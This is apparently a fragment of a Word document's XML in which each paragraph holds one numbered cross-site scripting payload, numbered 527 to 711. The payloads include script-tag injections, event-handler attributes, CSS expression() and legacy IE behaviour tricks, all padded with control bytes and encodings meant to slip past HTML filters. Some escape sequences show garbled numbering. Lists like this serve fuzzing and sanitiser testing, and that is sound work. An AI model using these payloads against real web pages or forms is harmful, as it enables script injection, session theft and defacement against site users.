    <w:p w14:paraId="69C6F6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"`'&gt;&lt;script&gt;\xE2\x80\x83javascript:alert(527)&lt;/script&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="10F806C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"`'&gt;&lt;script&gt;\xE2\x80\x8Bjavascript:alert(528)&lt;/script&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="16279E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"`'&gt;&lt;script&gt;\xEF\xBF\xBEjavascript:alert(529)&lt;/script&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="08EB5D6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"`'&gt;&lt;script&gt;\xE2\x80\x80javascript:alert(530)&lt;/script&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="486A9E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"`'&gt;&lt;script&gt;\x2531javascript:alert(531)&lt;/script&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3D54E7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"`'&gt;&lt;script&gt;\xE2\x80\x82javascript:alert(532)&lt;/script&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7D365F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"`'&gt;&lt;script&gt;\xE2\x80\x86javascript:alert(533)&lt;/script&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="29F6BE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"`'&gt;&lt;script&gt;\xE534\xA0\x8Ejavascript:alert(534)&lt;/script&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="79E4AA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"`'&gt;&lt;script&gt;\x0Bjavascript:alert(535)&lt;/script&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5465EF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"`'&gt;&lt;script&gt;\x20javascript:alert(536)&lt;/script&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="659BAC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"`'&gt;&lt;script&gt;\xC2\xA0javascript:alert(537)&lt;/script&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="202C16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"/&gt;&lt;img/onerror=\x0Bjavascript:alert(538)\x0Bsrc=xxx:x /&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="566EB5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"/&gt;&lt;img/onerror=\x22javascript:alert(539)\x22src=xxx:x /&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="702C40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"/&gt;&lt;img/onerror=\x09javascript:alert(540)\x09src=xxx:x /&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6CA9B5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"/&gt;&lt;img/onerror=\x27javascript:alert(541)\x27src=xxx:x /&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="45A8095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"/&gt;&lt;img/onerror=\x0Ajavascript:alert(542)\x0Asrc=xxx:x /&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5A7B44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"/&gt;&lt;img/onerror=\x0Cjavascript:alert(543)\x0Csrc=xxx:x /&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="45F8BE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"/&gt;&lt;img/onerror=\x0Djavascript:alert(544)\x0Dsrc=xxx:x /&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="72C357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"/&gt;&lt;img/onerror=\x60javascript:alert(545)\x60src=xxx:x /&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4B08A1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"/&gt;&lt;img/onerror=\x20javascript:alert(546)\x20src=xxx:x /&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="251F27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&lt;script\x2F&gt;javascript:alert(547)&lt;/script&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="372957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&lt;script\x20&gt;javascript:alert(548)&lt;/script&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4817D4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&lt;script\x0D&gt;javascript:alert(549)&lt;/script&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="554CF4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&lt;script\x0A&gt;javascript:alert(550)&lt;/script&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="043F50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&lt;script\x0C&gt;javascript:alert(551)&lt;/script&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0C0FE5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&lt;script\x00&gt;javascript:alert(552)&lt;/script&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="58D86D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&lt;script\x09&gt;javascript:alert(553)&lt;/script&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="01FC2B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onerror\x0B=javascript:alert(554)&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="422B1F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onerror\x00=javascript:alert(555)&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0B5A47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onerror\x0C=javascript:alert(556)&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="216B1A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onerror\x0D=javascript:alert(557)&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="24F563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onerror\x20=javascript:alert(558)&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="74E77DD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onerror\x0A=javascript:alert(559)&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6FD461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onerror\x09=javascript:alert(560)&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="41B0199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&lt;script&gt;javascript:alert(561)&lt;\x00/script&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1BD2CA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&lt;img src=# onerror\x3D"javascript:alert(562)" </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="00A74C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onfocus=javascript:alert(563) autofocus&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2D2340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onblur=javascript:alert(564) autofocus&gt;&lt;input autofocus&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3C6018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poster=javascript:javascript:alert(565)//</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4D9E2B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javascript:alert(566)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input autofocus&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="47E751D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id=test onforminput=javascript:alert(567)&gt;&lt;input&gt;&lt;/form&gt;&lt;button form=test onformchange=javascript:alert(567)&gt;X</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="103A97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&lt;video&gt;&lt;source onerror="javascript:javascript:alert(568)"&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="32D56AF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onerror="javascript:javascript:alert(569)"&gt;&lt;source&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="407494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&lt;form&gt;&lt;button formaction="javascript:javascript:alert(570)"&gt;X</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="537254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oninput=javascript:alert(571)&gt;&lt;input autofocus&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="64146C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&lt;math href="javascript:javascript:alert(572)"&gt;CLICKME&lt;/math&gt;  &lt;math&gt; &lt;maction actiontype="statusline#http://google.com" xlink:href="javascript:javascript:alert(572)"&gt;CLICKME&lt;/maction&gt; &lt;/math&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7E9F23F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onload=javascript:alert(573)&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3A3330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background="javascript:javascript:alert(574)"&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="58E862C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&lt;!--&lt;img src="--&gt;&lt;img src=x onerror=javascript:alert(575)//"&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6622BA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&lt;comment&gt;&lt;img src="&lt;/comment&gt;&lt;img src=x onerror=javascript:alert(576))//"&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5D64EE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&lt;![&gt;&lt;img src="]&gt;&lt;img src=x onerror=javascript:alert(577)//"&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0424BF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&lt;style&gt;&lt;img src="&lt;/style&gt;&lt;img src=x onerror=javascript:alert(578)//"&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="10CCF5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 style=list-style:url() onerror=javascript:alert(579)&gt; &lt;div style=content:url(data:image/svg+xml,%%3Csvg/%%3E);visibility:hidden onload=javascript:alert(579)&gt;&lt;/div&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="22051F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&lt;head&gt;&lt;base href="javascript://"&gt;&lt;/head&gt;&lt;body&gt;&lt;a href="/. /,javascript:alert(580)//#"&gt;XXX&lt;/a&gt;&lt;/body&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="39A8C7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FOR=document EVENT=onreadystatechange&gt;javascript:alert(581)&lt;/SCRIPT&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1B0632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CLASSID="clsid:333C7BC4-460F-582582D0-BC04-0080C7055A83"&gt;&lt;PARAM NAME="DataURL" VALUE="javascript:alert(582)"&gt;&lt;/OBJECT&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="57BB257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 &lt;script&gt;alert(583)&lt;/script&gt;0</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="419933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id="div584"&gt;&lt;input value="``onmouseover=javascript:alert(584)"&gt;&lt;/div&gt; &lt;div id="div2"&gt;&lt;/div&gt;&lt;script&gt;document.getElementById("div2").innerHTML = document.getElementById("div584").innerHTML;&lt;/script&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2D4763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'="foo"&gt;&lt;x foo='&gt;&lt;img src=x onerror=javascript:alert(585)//'&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="26C0AB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src="javascript:alert(586)"&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="487A2F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src="javascript:alert(587)"&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="127393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&lt;image src="javascript:alert(588)"&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="76F7FC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src="javascript:alert(589)"&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="22B1B11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style=width:590px;filter:glow onfilterchange=javascript:alert(590)&gt;x</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="15E342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foo="&gt;&lt;script&gt;javascript:alert(591)&lt;/script&gt;"&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4A7DFA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foo="&gt;&lt;script&gt;javascript:alert(592)&lt;/script&gt;"&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5DF995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 foo="&gt;&lt;script&gt;javascript:alert(593)&lt;/script&gt;"&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4AEA1F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foo="&gt;&lt;x foo='?&gt;&lt;script&gt;javascript:alert(594)&lt;/script&gt;'&gt;"&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="12BAF7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foo="[[[Inception]]"&gt;&lt;x foo="]foo&gt;&lt;script&gt;javascript:alert(595)&lt;/script&gt;"&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="29C760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 foo&gt;&lt;x foo="%&gt;&lt;script&gt;javascript:alert(596)&lt;/script&gt;"&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="60CBEB9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id=d&gt;&lt;x xmlns="&gt;&lt;iframe onload=javascript:alert(597)"&gt;&lt;/div&gt; &lt;script&gt;d.innerHTML=d.innerHTML&lt;/script&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0A1951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\x00src=x onerror="alert(598)"&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="08549E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\x47src=x onerror="javascript:alert(599)"&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="31547C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\x600600src=x onerror="javascript:alert(600)"&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1139AB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\x6012src=x onerror="javascript:alert(601)"&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6C6B5A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&lt;img\x47src=x onerror="javascript:alert(602)"&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6D87CF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&lt;img\x6030src=x onerror="javascript:alert(603)"&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0E4291C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&lt;img\x6043src=x onerror="javascript:alert(604)"&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2ADE23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&lt;img\x32src=x onerror="javascript:alert(605)"&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="271154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&lt;img\x47src=x onerror="javascript:alert(606)"&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5EF225E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&lt;img\x607607src=x onerror="javascript:alert(607)"&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0AA544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\x47src=x onerror="javascript:alert(608)"&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0137EE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\x34src=x onerror="javascript:alert(609)"&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="59BB93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\x39src=x onerror="javascript:alert(610)"&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0C1DDE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\x00src=x onerror="javascript:alert(611)"&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="70FFA4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src\x09=x onerror="javascript:alert(612)"&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1A46D1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src\x6130=x onerror="javascript:alert(613)"&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="29E329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src\x6143=x onerror="javascript:alert(614)"&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0AAAD5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src\x32=x onerror="javascript:alert(615)"&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="56CB95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src\x6162=x onerror="javascript:alert(616)"&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5B21689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src\x617617=x onerror="javascript:alert(617)"&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2BB5448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src\x00=x onerror="javascript:alert(618)"&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="64132F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src\x47=x onerror="javascript:alert(619)"&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4EFF47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src=x\x09onerror="javascript:alert(620)"&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3266E9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src=x\x6210onerror="javascript:alert(621)"&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3110BC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src=x\x622622onerror="javascript:alert(622)"&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6A17E9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src=x\x6232onerror="javascript:alert(623)"&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="32581F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src=x\x6243onerror="javascript:alert(624)"&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="79C558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&lt;img[a][b][c]src[d]=x[e]onerror=[f]"alert(625)"&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="22EE142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onerror=\x09"javascript:alert(626)"&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="228749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onerror=\x6270"javascript:alert(627)"&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3B0B26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onerror=\x628628"javascript:alert(628)"&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="35DF82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onerror=\x6292"javascript:alert(629)"&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5AA985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onerror=\x32"javascript:alert(630)"&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="347944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onerror=\x00"javascript:alert(631)"&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2B4CF8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href=java&amp;#632&amp;#2&amp;#3&amp;#4&amp;#5&amp;#6&amp;#7&amp;#8&amp;#632632&amp;#6322script:javascript:alert(632)&gt;XXX&lt;/a&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="42F149F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src="x` `&lt;script&gt;javascript:alert(633)&lt;/script&gt;"` `&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3DAEF70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onerror /" '"= alt=javascript:alert(634)//"&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7C4866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&lt;title onpropertychange=javascript:alert(635)&gt;&lt;/title&gt;&lt;title title=&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="00892A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href=http://foo.bar/#x=`y&gt;&lt;/a&gt;&lt;img alt="`&gt;&lt;img src=x:x onerror=javascript:alert(636)&gt;&lt;/a&gt;"&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="292CA5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&lt;!--[if]&gt;&lt;script&gt;javascript:alert(637)&lt;/script --&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="30DB07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&lt;!--[if&lt;img src=x onerror=javascript:alert(638)//]&gt; --&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5DAD42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id="x" classid="clsid:CB927D6392-4FF7-4a9e-A63969-56E4B8A75598"&gt;&lt;/object&gt; &lt;object classid="clsid:02BF25D5-8C6397-4B23-BC80-D3488ABDDC6B" onqt_error="javascript:alert(639)" style="behavior:url(#x);"&gt;&lt;param name=postdomevents /&gt;&lt;/object&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5AE507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style="-o-link:'javascript:javascript:alert(640)';-o-link-source:current"&gt;X</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1F5A2DA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&lt;style&gt;p[foo=bar{}*{-o-link:'javascript:javascript:alert(641)'}{}*{-o-link-source:current}]{color:red};&lt;/style&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6195FF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&lt;link rel=stylesheet href=data:,*%7bx:expression(javascript:alert(642))%7d</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="527266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&lt;style&gt;@import "data:,*%7bx:expression(javascript:alert(643))%7D";&lt;/style&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="09C9B2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style="pointer-events:none;position:absolute;"&gt;&lt;a style="position:absolute;" onclick="javascript:alert(644);"&gt;XXX&lt;/a&gt;&lt;/a&gt;&lt;a href="javascript:javascript:alert(644)"&gt;XXX&lt;/a&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="19DCCD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&lt;// style=x:expression\28javascript:alert(645)\29&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="46CFB97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&lt;style&gt;*{x:ｅｘｐｒｅｓｓｉｏｎ(javascript:alert(646))}&lt;/style&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2A0BDA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style="list-style:url(http://foo.f)\20url(javascript:javascript:alert(647));"&gt;X</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="23DBCE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&lt;script&gt;({set/**/$($){_/**/setter=$,_=javascript:alert(648)}}).$=eval&lt;/script&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="427DD6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&lt;script&gt;({0:#0=eval/#0#/#0#(javascript:alert(649))})&lt;/script&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="70A40C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&lt;script&gt;ReferenceError.prototype.__defineGetter__('name', function(){javascript:alert(650)}),x&lt;/script&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="606FC8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&lt;script&gt;Object.__noSuchMethod__ = Function,[{}][0].constructor._('javascript:alert(651)')()&lt;/script&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3B617A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charset="mac-farsi"&gt;¼script¾javascript:alert(652)¼/script¾</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="25A6EA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X&lt;x style=`behavior:url(#default#time2)` onbegin=`javascript:alert(653)` &gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0F85FA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654&lt;set/xmlns=`urn:schemas-microsoft-com:time` style=`beh&amp;#x4654vior:url(#default#time2)` attributename=`innerhtml` to=`&amp;lt;img/src=&amp;quot;x&amp;quot;onerror=javascript:alert(654)&amp;gt;`&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="21DFC3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655&lt;animate/xmlns=urn:schemas-microsoft-com:time style=behavior:url(#default#time2) attributename=innerhtml values=&amp;lt;img/src=&amp;quot;.&amp;quot;onerror=javascript:alert(655)&amp;gt;&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="206EE2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656&lt;a href=#&gt;&lt;line xmlns=urn:schemas-microsoft-com:vml style=behavior:url(#default#vml);position:absolute href=javascript:javascript:alert(656) strokecolor=white strokeweight=656000px from=0 to=656000 /&gt;&lt;/a&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="58FB0D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style="behavior:url(#default#AnchorClick);" folder="javascript:javascript:alert(657)"&gt;XXX&lt;/a&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3238E4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&lt;event-source src="%(event)s" onload="javascript:alert(658)"&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4BA904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href="javascript:javascript:alert(659)"&gt;&lt;event-source src="data:application/x-dom-event-stream,Event:click%0Adata:XXX%0A%0A"&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2E0B87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id="x"&gt;x&lt;/div&gt; &lt;xml:namespace prefix="t"&gt; &lt;import namespace="t" implementation="#default#time2"&gt; &lt;t:set attributeName="innerHTML" targetElement="x" to="&amp;lt;img&amp;#660660;src=x:x&amp;#660660;onerror&amp;#660660;=javascript:alert(660)&amp;gt;"&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0B611E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&lt;script&gt;javascript:alert(661)&lt;/script&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="27ECB9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SRC="javascript:javascript:alert(662);"&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3F8C95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SRC=javascript:javascript:alert(663)&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0F49D5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SRC=`javascript:javascript:alert(664)`&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1E80ACD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SRC="javascript:javascript:alert(665);"&gt;&lt;/FRAMESET&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4972C9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ONLOAD=javascript:alert(666)&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="53A861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ONLOAD=javascript:javascript:alert(667)&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7DB81C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    ascript:javascript:alert(668);"&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1B2C9D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onload!#$%%&amp;()*~+-_.,:;?@[/|\]^`=javascript:alert(669)&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="19A9B5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SRC="javascript:javascript:alert(670)"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1EB4911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SRC="javascript:javascript:alert(671);"&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="102F43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 DYNSRC="javascript:javascript:alert(672)"&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="004404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LOWSRC="javascript:javascript:alert(673)"&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4C6546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SRC="javascript:javascript:alert(674);"&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="644C932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SIZE="&amp;{javascript:alert(675)}"&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="68B529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HREF="javascript:javascript:alert(676);"&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="090D10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&lt;STYLE&gt;li {list-style-image: url("javascript:javascript:alert(677)");}&lt;/STYLE&gt;&lt;UL&gt;&lt;LI&gt;XSS</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="553D82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CONTENT="0;url=javascript:javascript:alert(678);"&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="33CAA1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 URL=http://;URL=javascript:javascript:alert(679);"&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7F8F76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SRC="javascript:javascript:alert(680);"&gt;&lt;/IFRAME&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3DCBD0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BACKGROUND="javascript:javascript:alert(681)"&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4F11AC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BACKGROUND="javascript:javascript:alert(682)"&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="74045C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url(javascript:javascript:alert(683))"&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="665118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STYLE="width:expression(javascript:alert(684));"&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="502294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STYLE="xss:expr/*XSS*/ession(javascript:alert(685))"&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="599ED4E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&lt;XSS STYLE="xss:expression(javascript:alert(686))"&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3D5AD1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TYPE="text/javascript"&gt;javascript:alert(687);&lt;/STYLE&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="60177F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&lt;STYLE&gt;.XSS{background-image:url("javascript:javascript:alert(688)");}&lt;/STYLE&gt;&lt;A CLASS=XSS&gt;&lt;/A&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="008B7D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type="text/css"&gt;BODY{background:url("javascript:javascript:alert(689)")}&lt;/STYLE&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="025C5D8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 gte IE 4]&gt;&lt;SCRIPT&gt;javascript:alert(690);&lt;/SCRIPT&gt;&lt;![endif]--&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2C7D76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HREF="javascript:javascript:alert(691);//"&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6440FC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classid=clsid:ae24fdae-03c6-692692d692-8b76-0080c744f389&gt;&lt;param name=url value=javascript:javascript:alert(692)&gt;&lt;/OBJECT&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2C2193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xmlns:xss&gt;&lt;?import namespace="xss" implementation="%(htc)s"&gt;&lt;xss:xss&gt;XSS&lt;/xss:xss&gt;&lt;/HTML&gt;""","XML namespace."),("""&lt;XML ID="xss"&gt;&lt;I&gt;&lt;B&gt;&amp;lt;IMG SRC="javas&lt;!-- --&gt;cript:javascript:alert(693)"&amp;gt;&lt;/B&gt;&lt;/I&gt;&lt;/XML&gt;&lt;SPAN DATASRC="#xss" DATAFLD="B" DATAFORMATAS="HTML"&gt;&lt;/SPAN&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1F2144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&lt;HTML&gt;&lt;BODY&gt;&lt;?xml:namespace prefix="t" ns="urn:schemas-microsoft-com:time"&gt;&lt;?import namespace="t" implementation="#default#time2"&gt;&lt;t:set attributeName="innerHTML" to="XSS&amp;lt;SCRIPT DEFER&amp;gt;javascript:alert(694)&amp;lt;/SCRIPT&amp;gt;"&gt;&lt;/BODY&gt;&lt;/HTML&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5A4F45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id="test" /&gt;&lt;button form="test" formaction="javascript:javascript:alert(695)"&gt;X</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2E3240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javascript:alert(696)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input autofocus&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="58DA3E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&lt;P STYLE="behavior:url('#default#time2')" end="0" onEnd="javascript:alert(697)"&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="478FA9D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&lt;STYLE&gt;a{background:url('s698' 's2)}@import javascript:javascript:alert(698);');}&lt;/STYLE&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6D72D1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charset= "x-imap4-modified-utf7"&amp;&amp;&gt;&amp;&amp;&lt;script&amp;&amp;&gt;javascript:alert(699)&amp;&amp;;&amp;&amp;&lt;&amp;&amp;/script&amp;&amp;&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="68ED50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onreadystatechange=javascript:javascript:alert(700);&gt;&lt;/SCRIPT&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7330C7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onreadystatechange=javascript:javascript:alert(701);&gt;&lt;/style&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3167BF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&lt;?xml version="702.0"?&gt;&lt;html:html xmlns:html='http://www.w3.org/702999/xhtml'&gt;&lt;html:script&gt;javascript:alert(702);&lt;/html:script&gt;&lt;/html:html&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="743745E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code=javascript:javascript:alert(703);&gt;&lt;/embed&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="07810AC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onload=javascript:javascript:alert(704)&gt;&lt;/frameset&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7C8845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onerror=javascript:javascript:alert(705)&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="12E694B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&lt;XML ID=I&gt;&lt;X&gt;&lt;C&gt;&lt;![CDATA[&lt;IMG SRC="javas]]&lt;![CDATA[cript:javascript:alert(706);"&gt;]]&lt;/C&gt;&lt;X&gt;&lt;/xml&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="32E4A6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SRC=&amp;{javascript:alert(707);};&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="08D32F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href="jav&amp;#65ascript:javascript:alert(708)"&gt;test708&lt;/a&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="28E335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href="jav&amp;#97ascript:javascript:alert(709)"&gt;test709&lt;/a&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2F8465C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srcdoc="&amp;LT;iframe&amp;sol;srcdoc=&amp;amp;lt;img&amp;sol;src=&amp;amp;apos;&amp;amp;apos;onerror=javascript:alert(710)&amp;amp;gt;&gt;"&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0540F6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';alert(711))//';alert(711))//";</w:t>
      </w:r>
    </w:p>
